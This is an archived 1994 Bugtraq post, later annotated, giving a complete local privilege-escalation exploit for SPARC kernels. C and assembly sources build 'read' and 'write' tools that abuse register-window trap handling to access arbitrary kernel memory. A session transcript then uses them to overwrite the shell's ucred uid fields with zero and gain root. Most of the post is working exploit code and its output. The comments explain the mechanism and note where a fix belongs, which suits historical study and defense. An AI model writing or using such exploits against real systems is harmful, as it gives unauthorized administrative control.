
[Tim Newsham: ]


From: newsham () uhunix uhcc hawaii edu (Tim Newsham)
Date: Sun, 2 Oct 1994 08:18:56 -1000


# Bugtraq post, Oct 1994, SPARC.  Builds two tools: "read" prints, in hex, whatever
# rdmem() returns for the address given in argv[1]; "write" calls wrmem(addr, value).
# The session transcript that follows uses them to change the uid fields of the
# running shell's ucred.
# Neither .s routine contains a load or a store.  Both set %fp to a caller-chosen,
# 8-byte-aligned address and then force register-window traps, so any data movement
# is done by the kernel's window spill/fill handlers (presumably without a user/kernel
# address check on the systems of the time -- the kernel side is not shown here).
# Defender's view: the fix belongs in the kernel trap path, not in user space.  The
# observable effect is an ordinary process whose euid/ruid change with no setuid exec.
cat > readc.c << _EOF_
/* K&R C, no headers.  argv[1] is parsed by strtoul with base 0 (so 0x... works).
   No argc check: with no argument argv[1] is NULL and strtoul dereferences it. */
main(argc, argv) char *argv[]; {
    printf("0x%x\n", rdmem(strtoul(argv[1], 0, 0)));
}
_EOF_
cat > reads.s << _EOF_
.globl  rdmem
 
! int rdmem(unsigned addr)     addr in %o0, result returned in %o0
! Leaf-style entry (retl, no initial save).  %i4 carries the original %sp and %i7
! the return address across the window changes below.  Every window other than the
! caller's is disturbed.
rdmem:
! Seven nested saves then seven restores: presumably drives the window file through
! overflow so that all windows except the current one are spilled and invalid.
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %sp, %i4                ! keep the real stack pointer
        mov     %o7, %i7                ! keep the return address
        btst    4, %o0                  ! bit 2 of addr selects the word within the 8-byte slot
        andn    %o0, 7, %fp             ! this window's %fp (= %i6) := addr rounded down to 8
        restore                         ! the window moved into has %sp == addr and is invalid:
                                        ! presumably the underflow handler fills it from [addr]
        bz,a    .+12                    ! annulled branch: the delay slot runs only if taken
        mov     %l0, %i0                ! (taken, bit 2 clear) result := first word
        mov     %l1, %i0                ! (not taken, bit 2 set) result := second word
        mov     %o4, %fp                ! real stack pointer saved above is now %o4
        retl
        restore                         ! %i0 becomes the caller's %o0
_EOF_
cat > writec.c << _EOF_
/* K&R C, no headers.  Both arguments go through strtoul with base 0.  No argc
   check: a missing argument means a NULL argv entry is passed to strtoul. */
main(argc, argv) char *argv[]; {
    wrmem(strtoul(argv[1], 0, 0), strtoul(argv[2], 0, 0));
}
_EOF_
cat > writes.s << _EOF_
.globl  wrmem
 
! void wrmem(unsigned addr, unsigned value)     addr in %o0, value in %o1
! Same window setup as rdmem, then a second walk through the window file to force
! the modified window back out to memory.  %i4 carries the original %sp and %i7 the
! return address.
wrmem:
! Seven nested saves then seven restores, as in rdmem.
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %o1, %i1                ! value is visible as %o1 after the restore below
        mov     %sp, %i4                ! keep the real stack pointer
        mov     %o7, %i7                ! keep the return address
        btst    4, %o0                  ! bit 2 of addr selects the word within the 8-byte slot
        andn    %o0, 7, %fp             ! this window's %fp := addr rounded down to 8
        restore                         ! move into the window whose %sp == addr (see rdmem)
        bz,a    .+12                    ! annulled branch: the delay slot runs only if taken
        mov     %o1, %l0                ! (taken, bit 2 clear) value into the first word
        mov     %o1, %l1                ! (not taken, bit 2 set) value into the second word
 
        save    %o4, 64, %sp            ! new window based on the real stack pointer (%o4)
 
! Six more saves then seven restores: forces window overflow.  Presumably the spill
! handler writes the window whose %sp is addr -- %l0/%l1 included -- to [addr].
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        save    %sp, 64, %sp
        restore
        restore
        restore
        restore
        restore
        restore
        restore
 
        mov     %o4, %fp                ! restore the real frame pointer
        retl
        restore
_EOF_
# K&R sources with implicit declarations: a modern compiler will warn on these.
cc -o read readc.c reads.s
cc -o write writec.c writes.s
otsuka% ps -lp $$
 F S   UID   PID  PPID  C PRI NI     ADDR     SZ    WCHAN TTY      TIME COMD
 8 S 23384   641     1145   1 20 fcfd6800    374 fcfd69c8 console  0:01 csh
# Offset 0x28 is the pointer to the shell's ucred struct.
otsuka% ./read 0xfcfd6828
0xfcfbc380
# Offsets 0x4 and 0xc in the ucred contain the effective and real uid.
otsuka% ./write 0xfcfbc384 0
otsuka% ./write 0xfcfbc38c 0
whoami


